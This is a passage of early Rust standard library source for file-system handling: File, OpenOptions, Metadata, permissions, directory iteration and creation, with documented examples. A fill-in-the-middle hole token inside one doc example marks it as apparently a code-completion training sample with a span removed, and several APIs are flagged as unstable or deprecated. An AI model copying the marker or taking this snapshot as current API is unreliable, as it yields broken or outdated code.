/// .read(true)
/// .write(true)
/// .create(true)
/// .open("foo.txt");
/// ```
#[derive(Clone)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct OpenOptions(fs_imp::OpenOptions);
/// Representation of the various permissions on a file.
///
/// This module only currently provides one bit of information, `readonly`,
/// which is exposed on all currently supported platforms. Unix-specific
/// functionality, such as mode bits, is available through the
/// `os::unix::PermissionsExt` trait.
#[derive(Clone, PartialEq, Eq, Debug)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct Permissions(fs_imp::FilePermissions);
/// An structure representing a type of file with accessors for each file type.
#[unstable(feature = "file_type", reason = "recently added API")]
#[derive(Copy, Clone, PartialEq, Eq, Hash)]
pub struct FileType(fs_imp::FileType);
/// A builder used to create directories in various manners.
///
/// This builder also supports platform-specific options.
#[unstable(feature = "dir_builder", reason = "recently added API")]
pub struct DirBuilder {
inner: fs_imp::DirBuilder,
recursive: bool,
}
impl File {
/// Attempts to open a file in read-only mode.
///
/// See the `OpenOptions::open` method for more details.
///
/// # Errors
///
/// This function will return an error if `path` does not already exist.
/// Other errors may also be returned according to `OpenOptions::open`.
///
/// # Examples
///
/// ```no_run
/// use std::fs::File;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::open("foo.txt"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn open<P: AsRef<Path>>(path: P) -> io::Result<File> {
OpenOptions::new().read(true).open(path)
}
/// Opens a file in write-only mode.
///
/// This function will create a file if it does not exist,
/// and will truncate it if it does.
///
/// See the `OpenOptions::open` function for more details.
///
/// # Examples
///
/// ```no_run
/// use std::fs::File;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::create("foo.txt"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn create<P: AsRef<Path>>(path: P) -> io::Result<File> {
OpenOptions::new().write(true).create(true).truncate(true).open(path)
}
/// Returns `None`.
#[unstable(feature = "file_path",
reason = "this abstraction was imposed by this library and was removed")]
#[deprecated(since = "1.0.0", reason = "abstraction was removed")]
pub fn path(&self) -> Option<&Path> {
None
}
/// Attempts to sync all OS-internal metadata to disk.
///
/// This function will attempt to ensure that all in-core data reaches the
/// filesystem before returning.
///
/// # Examples
///
/// ```no_run
/// use std::fs::File;
/// use std::io::prelude::*;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::create("foo.txt"));
/// try!(f.write_all(b"Hello, world!"));
///
/// try!(f.sync_all());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn sync_all(&self) -> io::Result<()> {
self.inner.fsync()
}
/// This function is similar to `sync_all`, except that it may not
/// synchronize file metadata to the filesystem.
///
/// This is intended for use cases that must synchronize content, but don't
/// need the metadata on disk. The goal of this method is to reduce disk
/// operations.
///
/// Note that some platforms may simply implement this in terms of
/// `sync_all`.
///
/// # Examples
///
/// ```no_run
/// use std::fs::File;
/// use std::io::prelude::*;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::create("foo.txt"));
/// try!(f.write_all(b"Hello, world!"));
///
/// try!(f.sync_data());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn sync_data(&self) -> io::Result<()> {
self.inner.datasync()
}
/// Truncates or extends the underlying file, updating the size of
/// this file to become `size`.
///
/// If the `size` is less than the current file's size, then the file will
/// be shrunk. If it is greater than the current file's size, then the file
/// will be extended to `size` and have all of the intermediate data filled
/// in with 0s.
///
/// # Examples
///
/// ```no_run
/// use std::fs::File;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::open("foo.txt"));
/// try!(f.set_len(0));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn set_len(&self, size: u64) -> io::Result<()> {
self.inner.truncate(size)
}
/// Queries metadata about the underlying file.
///
/// # Examples
///
/// ```no_run
/// use std::fs::File;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::open("foo.txt"));
/// let metadata = try!(f.metadata());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn metadata(&self) -> io::Result<Metadata> {
self.inner.file_attr().map(Metadata)
}
}
impl AsInner<fs_imp::File> for File {
fn as_inner(&self) -> &fs_imp::File { &self.inner }
}
impl FromInner<fs_imp::File> for File {
fn from_inner(f: fs_imp::File) -> File {
File { inner: f }
}
}
impl fmt::Debug for File {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
self.inner.fmt(f)
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl Read for File {
fn read(&mut self, buf: &mut [u8]) -> io::Result<usize> {
self.inner.read(buf)
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl Write for File {
fn write(&mut self, buf: &[u8]) -> io::Result<usize> {
self.inner.write(buf)
}
fn flush(&mut self) -> io::Result<()> { self.inner.flush() }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl Seek for File {
fn seek(&mut self, pos: SeekFrom) -> io::Result<u64> {
self.inner.seek(pos)
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a> Read for &'a File {
fn read(&mut self, buf: &mut [u8]) -> io::Result<usize> {
self.inner.read(buf)
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a> Write for &'a File {
fn write(&mut self, buf: &[u8]) -> io::Result<usize> {
self.inner.write(buf)
}
fn flush(&mut self) -> io::Result<()> { self.inner.flush() }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a> Seek for &'a File {
fn seek(&mut self, pos: SeekFrom) -> io::Result<u64> {
self.inner.seek(pos)
}
}
impl OpenOptions {
/// Creates a blank net set of options ready for configuration.
///
/// All options are initially set to `false`.
///
/// # Examples
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().open("foo.txt");
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn new() -> OpenOptions {
OpenOptions(fs_imp::OpenOptions::new())
}
/// Sets the option for read access.
///
/// This option, when true, will indicate that the file should be
/// `read`-able if opened.
///
/// # Examples
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().read(true).open("foo.txt");
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn read(&mut self, read: bool) -> &mut OpenOptions {
self.0.read(read); self
}
/// Sets the option for write access.
///
/// This option, when true, will indicate that the file should be
/// `write`-able if opened.
///
/// # Examples
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().write(true).open("foo.txt");
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn write(&mut self, write: bool) -> &mut OpenOptions {
self.0.write(write); self
}
/// Sets the option for the append mode.
///
/// This option, when true, means that writes will append to a file instead
/// of overwriting previous contents.
///
/// # Examples
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().append(true).open("foo.txt");
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn append(&mut self, append: bool) -> &mut OpenOptions {
self.0.append(append); self
}
/// Sets the option for truncating a previous file.
///
/// If a file is successfully opened with this option set it will truncate
/// the file to 0 length if it already exists.
///
/// # Examples
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().truncate(true).open("foo.txt");
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn truncate(&mut self, truncate: bool) -> &mut OpenOptions {
self.0.truncate(truncate); self
}
/// Sets the option for creating a new file.
///
/// This option indicates whether a new file will be created if the file
/// does not yet already exist.
///
/// # Examples
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().create(true).open("foo.txt");
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn create(&mut self, create: bool) -> &mut OpenOptions {
self.0.create(create); self
}
/// Opens a file at `path` with the options specified by `self`.
///
/// # Errors
///
/// This function will return an error under a number of different
/// circumstances, to include but not limited to:
///
/// * Opening a file that does not exist with read access.
/// * Attempting to open a file with access that the user lacks
/// permissions for
/// * Filesystem-level errors (full disk, etc)
///
/// # Examples
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().open("foo.txt");
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn open<P: AsRef<Path>>(&self, path: P) -> io::Result<File> {
let path = path.as_ref();
let inner = try!(fs_imp::File::open(path, &self.0));
Ok(File { inner: inner })
}
}
impl AsInnerMut<fs_imp::OpenOptions> for OpenOptions {
fn as_inner_mut(&mut self) -> &mut fs_imp::OpenOptions { &mut self.0 }
}
impl Metadata {
/// Returns the file type for this metadata.
#[unstable(feature = "file_type", reason = "recently added API")]
pub fn file_type(&self) -> FileType {
FileType(self.0.file_type())
}
/// Returns whether this metadata is for a directory.
///
/// # Examples
///
/// ```
/// # fn foo() -> std::io::Result<()> {
/// use std::fs;
///
/// let metadata = try!(fs::metadata("foo.txt"));
///
/// assert!(!metadata.is_dir());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn is_dir(&self) -> bool { self.file_type().is_dir() }
/// Returns whether this metadata is for a regular file.
///
/// # Examples
///
/// ```
/// # fn foo() -> std::io::Result<()> {
/// use std::fs;
///
/// let metadata = try!(fs::metadata("foo.txt"));
///
/// assert!(metadata.is_file());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn is_file(&self) -> bool { self.file_type().is_file() }
/// Returns the size of the file, in bytes, this metadata is for.
///
/// # Examples
///
/// ```
/// # fn foo() -> std::io::Result<()> {
/// use std::fs;
///
/// let metadata = try!(fs::metadata("foo.txt"));
///
/// assert_eq!(0, metadata.len());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn len(&self) -> u64 { self.0.size() }
/// Returns the permissions of the file this metadata is for.
///
/// # Examples
///
/// ```
/// # fn foo() -> std::io::Result<()> {
/// use std::fs;
///
/// let metadata = try!(fs::metadata("foo.txt"));<|fim▁hole|> ///
/// assert!(!metadata.permissions().readonly());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn permissions(&self) -> Permissions {
Permissions(self.0.perm())
}
/// Returns the most recent access time for a file.
///
/// The return value is in milliseconds since the epoch.
#[unstable(feature = "fs_time",
reason = "the return type of u64 is not quite appropriate for \
this method and may change if the standard library \
gains a type to represent a moment in time")]
#[deprecated(since = "1.1.0",
reason = "use os::platform::fs::MetadataExt extension traits")]
pub fn accessed(&self) -> u64 {
self.adjust_time(self.0.accessed())
}
/// Returns the most recent modification time for a file.
///
/// The return value is in milliseconds since the epoch.
#[unstable(feature = "fs_time",
reason = "the return type of u64 is not quite appropriate for \
this method and may change if the standard library \
gains a type to represent a moment in time")]
#[deprecated(since = "1.1.0",
reason = "use os::platform::fs::MetadataExt extension traits")]
pub fn modified(&self) -> u64 {
self.adjust_time(self.0.modified())
}
fn adjust_time(&self, val: u64) -> u64 {
// FILETIME (what `val` represents) is in 100ns intervals and there are
// 10000 intervals in a millisecond.
if cfg!(windows) {val / 10000} else {val}
}
}
impl AsInner<fs_imp::FileAttr> for Metadata {
fn as_inner(&self) -> &fs_imp::FileAttr { &self.0 }
}
impl Permissions {
/// Returns whether these permissions describe a readonly file.
///
/// # Examples
///
/// ```
/// use std::fs::File;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::create("foo.txt"));
/// let metadata = try!(f.metadata());
///
/// assert_eq!(false, metadata.permissions().readonly());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn readonly(&self) -> bool { self.0.readonly() }
/// Modifies the readonly flag for this set of permissions.
///
/// This operation does **not** modify the filesystem. To modify the
/// filesystem use the `fs::set_permissions` function.
///
/// # Examples
///
/// ```
/// use std::fs::File;
///
/// # fn foo() -> std::io::Result<()> {
/// let f = try!(File::create("foo.txt"));
/// let metadata = try!(f.metadata());
/// let mut permissions = metadata.permissions();
///
/// permissions.set_readonly(true);
///
/// // filesystem doesn't change
/// assert_eq!(false, metadata.permissions().readonly());
///
/// // just this particular `permissions`.
/// assert_eq!(true, permissions.readonly());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn set_readonly(&mut self, readonly: bool) {
self.0.set_readonly(readonly)
}
}
#[unstable(feature = "file_type", reason = "recently added API")]
impl FileType {
/// Test whether this file type represents a directory.
pub fn is_dir(&self) -> bool { self.0.is_dir() }
/// Test whether this file type represents a regular file.
pub fn is_file(&self) -> bool { self.0.is_file() }
/// Test whether this file type represents a symbolic link.
pub fn is_symlink(&self) -> bool { self.0.is_symlink() }
}
impl FromInner<fs_imp::FilePermissions> for Permissions {
fn from_inner(f: fs_imp::FilePermissions) -> Permissions {
Permissions(f)
}
}
impl AsInner<fs_imp::FilePermissions> for Permissions {
fn as_inner(&self) -> &fs_imp::FilePermissions { &self.0 }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl Iterator for ReadDir {
type Item = io::Result<DirEntry>;
fn next(&mut self) -> Option<io::Result<DirEntry>> {
self.0.next().map(|entry| entry.map(DirEntry))
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl DirEntry {
/// Returns the full path to the file that this entry represents.
///
/// The full path is created by joining the original path to `read_dir` or
/// `walk_dir` with the filename of this entry.
///
/// # Examples
///
/// ```
/// use std::fs;
/// # fn foo() -> std::io::Result<()> {
/// for entry in try!(fs::read_dir(".")) {
/// let dir = try!(entry);
/// println!("{:?}", dir.path());
/// }
/// # Ok(())
/// # }
/// ```
///
/// This prints output like:
///
/// ```text
/// "./whatever.txt"
/// "./foo.html"
/// "./hello_world.rs"
/// ```
///
/// The exact text, of course, depends on what files you have in `.`.
#[stable(feature = "rust1", since = "1.0.0")]
pub fn path(&self) -> PathBuf { self.0.path() }
/// Return the metadata for the file that this entry points at.
///
/// This function will not traverse symlinks if this entry points at a
/// symlink.
///
/// # Platform behavior
///
/// On Windows this function is cheap to call (no extra system calls
/// needed), but on Unix platforms this function is the equivalent of
/// calling `symlink_metadata` on the path.
#[unstable(feature = "dir_entry_ext", reason = "recently added API")]
pub fn metadata(&self) -> io::Result<Metadata> {
self.0.metadata().map(Metadata)
}
/// Return the file type for the file that this entry points at.
///
/// This function will not traverse symlinks if this entry points at a
/// symlink.
///
/// # Platform behavior
///
/// On Windows and most Unix platforms this function is free (no extra
/// system calls needed), but some Unix platforms may require the equivalent
/// call to `symlink_metadata` to learn about the target file type.
#[unstable(feature = "dir_entry_ext", reason = "recently added API")]
pub fn file_type(&self) -> io::Result<FileType> {
self.0.file_type().map(FileType)
}
/// Returns the bare file name of this directory entry without any other
/// leading path component.
#[unstable(feature = "dir_entry_ext", reason = "recently added API")]
pub fn file_name(&self) -> OsString {
self.0.file_name()
}
}
impl AsInner<fs_imp::DirEntry> for DirEntry {
fn as_inner(&self) -> &fs_imp::DirEntry { &self.0 }
}
/// Removes a file from the underlying filesystem.
///
/// Note that, just because an unlink call was successful, it is not
/// guaranteed that a file is immediately deleted (e.g. depending on
/// platform, other open file descriptors may prevent immediate removal).
///
/// # Errors
///
/// This function will return an error if `path` points to a directory, if the
/// user lacks permissions to remove the file, or if some other filesystem-level
/// error occurs.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::remove_file("a.txt"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn remove_file<P: AsRef<Path>>(path: P) -> io::Result<()> {
fs_imp::unlink(path.as_ref())
}
/// Given a path, query the file system to get information about a file,
/// directory, etc.
///
/// This function will traverse symbolic links to query information about the
/// destination file.
///
/// # Examples
///
/// ```rust
/// # fn foo() -> std::io::Result<()> {
/// use std::fs;
///
/// let attr = try!(fs::metadata("/some/file/path.txt"));
/// // inspect attr ...
/// # Ok(())
/// # }
/// ```
///
/// # Errors
///
/// This function will return an error if the user lacks the requisite
/// permissions to perform a `metadata` call on the given `path` or if there
/// is no entry in the filesystem at the provided path.
#[stable(feature = "rust1", since = "1.0.0")]
pub fn metadata<P: AsRef<Path>>(path: P) -> io::Result<Metadata> {
fs_imp::stat(path.as_ref()).map(Metadata)
}
/// Query the metadata about a file without following symlinks.
///
/// # Examples
///
/// ```rust
/// #![feature(symlink_metadata)]
/// # fn foo() -> std::io::Result<()> {
/// use std::fs;
///
/// let attr = try!(fs::symlink_metadata("/some/file/path.txt"));
/// // inspect attr ...
/// # Ok(())
/// # }
/// ```
#[unstable(feature = "symlink_metadata", reason = "recently added API")]
pub fn symlink_metadata<P: AsRef<Path>>(path: P) -> io::Result<Metadata> {
fs_imp::lstat(path.as_ref()).map(Metadata)
}
/// Rename a file or directory to a new name.
///
/// # Errors
///
/// This function will return an error if the provided `from` doesn't exist, if
/// the process lacks permissions to view the contents, if `from` and `to`
/// reside on separate filesystems, or if some other intermittent I/O error
/// occurs.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::rename("a.txt", "b.txt"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn rename<P: AsRef<Path>, Q: AsRef<Path>>(from: P, to: Q) -> io::Result<()> {
fs_imp::rename(from.as_ref(), to.as_ref())
}
/// Copies the contents of one file to another. This function will also
/// copy the permission bits of the original file to the destination file.
///
/// This function will **overwrite** the contents of `to`.
///
/// Note that if `from` and `to` both point to the same file, then the file
/// will likely get truncated by this operation.
///
/// # Errors
///
/// This function will return an error in the following situations, but is not
/// limited to just these cases:
///
/// * The `from` path is not a file
/// * The `from` file does not exist
/// * The current process does not have the permission rights to access
/// `from` or write `to`
///
/// # Examples
///
/// ```no_run
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::copy("foo.txt", "bar.txt"));
/// # Ok(()) }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn copy<P: AsRef<Path>, Q: AsRef<Path>>(from: P, to: Q) -> io::Result<u64> {
let from = from.as_ref();
let to = to.as_ref();
if !from.is_file() {
return Err(Error::new(ErrorKind::InvalidInput,
"the source path is not an existing file"))
}
let mut reader = try!(File::open(from));
let mut writer = try!(File::create(to));
let perm = try!(reader.metadata()).permissions();
let ret = try!(io::copy(&mut reader, &mut writer));
try!(set_permissions(to, perm));
Ok(ret)
}
/// Creates a new hard link on the filesystem.
///
/// The `dst` path will be a link pointing to the `src` path. Note that systems
/// often require these two paths to both be located on the same filesystem.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::hard_link("a.txt", "b.txt"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn hard_link<P: AsRef<Path>, Q: AsRef<Path>>(src: P, dst: Q) -> io::Result<()> {
fs_imp::link(src.as_ref(), dst.as_ref())
}
/// Creates a new symbolic link on the filesystem.
///
/// The `dst` path will be a symbolic link pointing to the `src` path.
/// On Windows, this will be a file symlink, not a directory symlink;
/// for this reason, the platform-specific `std::os::unix::fs::symlink`
/// and `std::os::windows::fs::{symlink_file, symlink_dir}` should be
/// used instead to make the intent explicit.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::soft_link("a.txt", "b.txt"));
/// # Ok(())
/// # }
/// ```
#[deprecated(since = "1.0.0",
reason = "replaced with std::os::unix::fs::symlink and \
std::os::windows::fs::{symlink_file, symlink_dir}")]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn soft_link<P: AsRef<Path>, Q: AsRef<Path>>(src: P, dst: Q) -> io::Result<()> {
fs_imp::symlink(src.as_ref(), dst.as_ref())
}
/// Reads a symbolic link, returning the file that the link points to.
///
/// # Errors
///
/// This function will return an error on failure. Failure conditions include
/// reading a file that does not exist or reading a file that is not a symbolic
/// link.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// let path = try!(fs::read_link("a.txt"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn read_link<P: AsRef<Path>>(path: P) -> io::Result<PathBuf> {
fs_imp::readlink(path.as_ref())
}
/// Returns the canonical form of a path with all intermediate components
/// normalized and symbolic links resolved.
#[unstable(feature = "fs_canonicalize", reason = "recently added API")]
pub fn canonicalize<P: AsRef<Path>>(path: P) -> io::Result<PathBuf> {
fs_imp::canonicalize(path.as_ref())
}
/// Creates a new, empty directory at the provided path
///
/// # Errors
///
/// This function will return an error if the user lacks permissions to make a
/// new directory at the provided `path`, or if the directory already exists.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::create_dir("/some/dir"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn create_dir<P: AsRef<Path>>(path: P) -> io::Result<()> {
DirBuilder::new().create(path.as_ref())
}
/// Recursively create a directory and all of its parent components if they
/// are missing.
///
/// # Errors
///
/// This function will fail if any directory in the path specified by `path`
/// does not already exist and it could not be created otherwise. The specific
/// error conditions for when a directory is being created (after it is
/// determined to not exist) are outlined by `fs::create_dir`.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::create_dir_all("/some/dir"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn create_dir_all<P: AsRef<Path>>(path: P) -> io::Result<()> {
DirBuilder::new().recursive(true).create(path.as_ref())
}
/// Removes an existing, empty directory.
///
/// # Errors
///
/// This function will return an error if the user lacks permissions to remove
/// the directory at the provided `path`, or if the directory isn't empty.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::remove_dir("/some/dir"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn remove_dir<P: AsRef<Path>>(path: P) -> io::Result<()> {
fs_imp::rmdir(path.as_ref())
}
/// Removes a directory at this path, after removing all its contents. Use
/// carefully!
///
/// This function does **not** follow symbolic links and it will simply remove the
/// symbolic link itself.
///
/// # Errors
///
/// See `file::remove_file` and `fs::remove_dir`.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::remove_dir_all("/some/dir"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn remove_dir_all<P: AsRef<Path>>(path: P) -> io::Result<()> {
let path = path.as_ref();
for child in try!(read_dir(path)) {
let child = try!(child).path();
let stat = try!(symlink_metadata(&*child));
if stat.is_dir() {
try!(remove_dir_all(&*child));
} else {
try!(remove_file(&*child));
}
}
remove_dir(path)
}
/// Returns an iterator over the entries within a directory.
///
/// The iterator will yield instances of `io::Result<DirEntry>`. New errors may
/// be encountered after an iterator is initially constructed.
///
/// # Examples
///
/// ```
/// # #![feature(path_ext)]
/// use std::io;
/// use std::fs::{self, PathExt, DirEntry};
/// use std::path::Path;
///
/// // one possible implementation of fs::walk_dir only visiting files
/// fn visit_dirs(dir: &Path, cb: &mut FnMut(DirEntry)) -> io::Result<()> {
/// if dir.is_dir() {
/// for entry in try!(fs::read_dir(dir)) {
/// let entry = try!(entry);
/// if entry.path().is_dir() {
/// try!(visit_dirs(&entry.path(), cb));
/// } else {
/// cb(entry);
/// }
/// }
/// }
/// Ok(())
/// }
/// ```
///
/// # Errors
///
/// This function will return an error if the provided `path` doesn't exist, if
/// the process lacks permissions to view the contents or if the `path` points
/// at a non-directory file
#[stable(feature = "rust1", since = "1.0.0")]
pub fn read_dir<P: AsRef<Path>>(path: P) -> io::Result<ReadDir> {
fs_imp::readdir(path.as_ref()).map(ReadDir)
}
/// Returns an iterator that will recursively walk the directory structure
/// rooted at `path`.
///
/// The path given will not be iterated over, and this will perform iteration in
/// some top-down order. The contents of unreadable subdirectories are ignored.
///
/// The iterator will yield instances of `io::Result<DirEntry>`. New errors may
/// be encountered after an iterator is initially constructed.
#[unstable(feature = "fs_walk",
reason = "the precise semantics and defaults for a recursive walk \
may change and this may end up accounting for files such \
as symlinks differently")]
pub fn walk_dir<P: AsRef<Path>>(path: P) -> io::Result<WalkDir> {
let start = try!(read_dir(path));
Ok(WalkDir { cur: Some(start), stack: Vec::new() })
}
#[unstable(feature = "fs_walk")]
impl Iterator for WalkDir {
type Item = io::Result<DirEntry>;
fn next(&mut self) -> Option<io::Result<DirEntry>> {
loop {
if let Some(ref mut cur) = self.cur {
match cur.next() {
Some(Err(e)) => return Some(Err(e)),
Some(Ok(next)) => {
let path = next.path();
if path.is_dir() {
self.stack.push(read_dir(&*path));
}
return Some(Ok(next))
}
None => {}
}
}
self.cur = None;
match self.stack.pop() {
Some(Err(e)) => return Some(Err(e)),
Some(Ok(next)) => self.cur = Some(next),
None => return None,
}
}
}
}
/// Utility methods for paths.
#[unstable(feature = "path_ext",
reason = "the precise set of methods exposed on this trait may \
change and some methods may be removed")]
pub trait PathExt {
/// Gets information on the file, directory, etc at this path.
///
/// Consult the `fs::metadata` documentation for more info.
///
/// This call preserves identical runtime/error semantics with
/// `fs::metadata`.
fn metadata(&self) -> io::Result<Metadata>;
/// Gets information on the file, directory, etc at this path.
///
/// Consult the `fs::symlink_metadata` documentation for more info.
///
/// This call preserves identical runtime/error semantics with
/// `fs::symlink_metadata`.
fn symlink_metadata(&self) -> io::Result<Metadata>;
/// Returns the canonical form of a path, normalizing all components and
/// eliminate all symlinks.
///
/// This call preserves identical runtime/error semantics with
/// `fs::canonicalize`.
fn canonicalize(&self) -> io::Result<PathBuf>;
/// Reads the symlink at this path.
///
/// For more information see `fs::read_link`.
fn read_link(&self) -> io::Result<PathBuf>;
/// Reads the directory at this path.
///
/// For more information see `fs::read_dir`.
fn read_dir(&self) -> io::Result<ReadDir>;
/// Boolean value indicator whether the underlying file exists on the local
/// filesystem. Returns false in exactly the cases where `fs::stat` fails.
fn exists(&self) -> bool;
/// Whether the underlying implementation (be it a file path, or something
/// else) points at a "regular file" on the FS. Will return false for paths
/// to non-existent locations or directories or other non-regular files
/// (named pipes, etc). Follows links when making this determination.
fn is_file(&self) -> bool;
/// Whether the underlying implementation (be it a file path, or something
/// else) is pointing at a directory in the underlying FS. Will return
/// false for paths to non-existent locations or if the item is not a
/// directory (eg files, named pipes, etc). Follows links when making this
/// determination.
fn is_dir(&self) -> bool;
}
impl PathExt for Path {
fn metadata(&self) -> io::Result<Metadata> { metadata(self) }
fn symlink_metadata(&self) -> io::Result<Metadata> { symlink_metadata(self) }
fn canonicalize(&self) -> io::Result<PathBuf> { canonicalize(self) }
fn read_link(&self) -> io::Result<PathBuf> { read_link(self) }
fn read_dir(&self) -> io::Result<ReadDir> { read_dir(self) }
fn exists(&self) -> bool { metadata(self).is_ok() }
fn is_file(&self) -> bool {
metadata(self).map(|s| s.is_file()).unwrap_or(false)
}
fn is_dir(&self) -> bool {
metadata(self).map(|s| s.is_dir()).unwrap_or(false)
}
}
/// Changes the timestamps for a file's last modification and access time.
///
/// The file at the path specified will have its last access time set to
/// `accessed` and its modification time set to `modified`. The times specified
/// should be in milliseconds.
#[unstable(feature = "fs_time",
reason = "the argument type of u64 is not quite appropriate for \
this function and may change if the standard library \
gains a type to represent a moment in time")]
pub fn set_file_times<P: AsRef<Path>>(path: P, accessed: u64,
modified: u64) -> io::Result<()> {
fs_imp::utimes(path.as_ref(), accessed, modified)
}
/// Changes the permissions found on a file or a directory.
///
/// # Examples
///
/// ```
/// # #![feature(fs)]
/// # fn foo() -> std::io::Result<()> {
/// use std::fs;
///
/// let mut perms = try!(fs::metadata("foo.txt")).permissions();
/// perms.set_readonly(true);
/// try!(fs::set_permissions("foo.txt", perms));
/// # Ok(())
/// # }
/// ```
///
/// # Errors
///
/// This function will return an error if the provided `path` doesn't exist, if
/// the process lacks permissions to change the attributes of the file, or if
/// some other I/O error is encountered.
#[unstable(feature = "fs",
reason = "a more granual ability to set specific permissions may \
be exposed on the Permissions structure itself and this \
method may not always exist")]
pub fn set_permissions<P: AsRef<Path>>(path: P, perm: Permissions) -> io::Result<()> {
fs_imp::set_perm(path.as_ref(), perm.0)
}
impl DirBuilder {
/// Creates a new set of options with default mode/security settings for all
/// platforms and also non-recursive.
pub fn new() -> DirBuilder {
DirBuilder {
inner: fs_imp::DirBuilder::new(),
recursive: false,
}
}
/// Indicate that directories create should be created recursively, creating
/// all parent directories if they do not exist with the same security and
/// permissions settings.
///
/// This option defaults to `false`
pub fn recursive(&mut self, recursive: bool) -> &mut Self {
self.recursive = recursive;
self
}
/// Create the specified directory with the options configured in this
/// builder.
pub fn create<P: AsRef<Path>>(&self, path: P) -> io::Result<()> {
let path = path.as_ref();
if self.recursive {
self.create_dir_all(path)
} else {
self.inner.mkdir(path)
}
}
fn create_dir_all(&self, path: &Path) -> io::Result<()> {
if path == Path::new("") || path.is_dir() { return Ok(()) }
if let Some(p) = path.parent() {
try!(self.create_dir_all(p))
}
self.inner.mkdir(path)
}
}
impl AsInnerMut<fs_imp::DirBuilder> for DirBuilder {
fn as_inner_mut(&mut self) -> &mut fs_imp::DirBuilder {
&mut self.inner
}
}
#[cfg(test)]
mod tests {
#![allow(deprecated)] //rand
use prelude::v1::*;
use io::prelude::*;
use env;
use fs::{self, File, OpenOptions};
use io::{ErrorKind, SeekFrom};
use path::PathBuf;
use path::Path as Path2;
use os;
use rand::{self, StdRng, Rng};
use str;
macro_rules! check { ($e:expr) => (
match $e {
Ok(t) => t,
Err(e) => panic!("{} failed with: {}", stringify!($e), e),
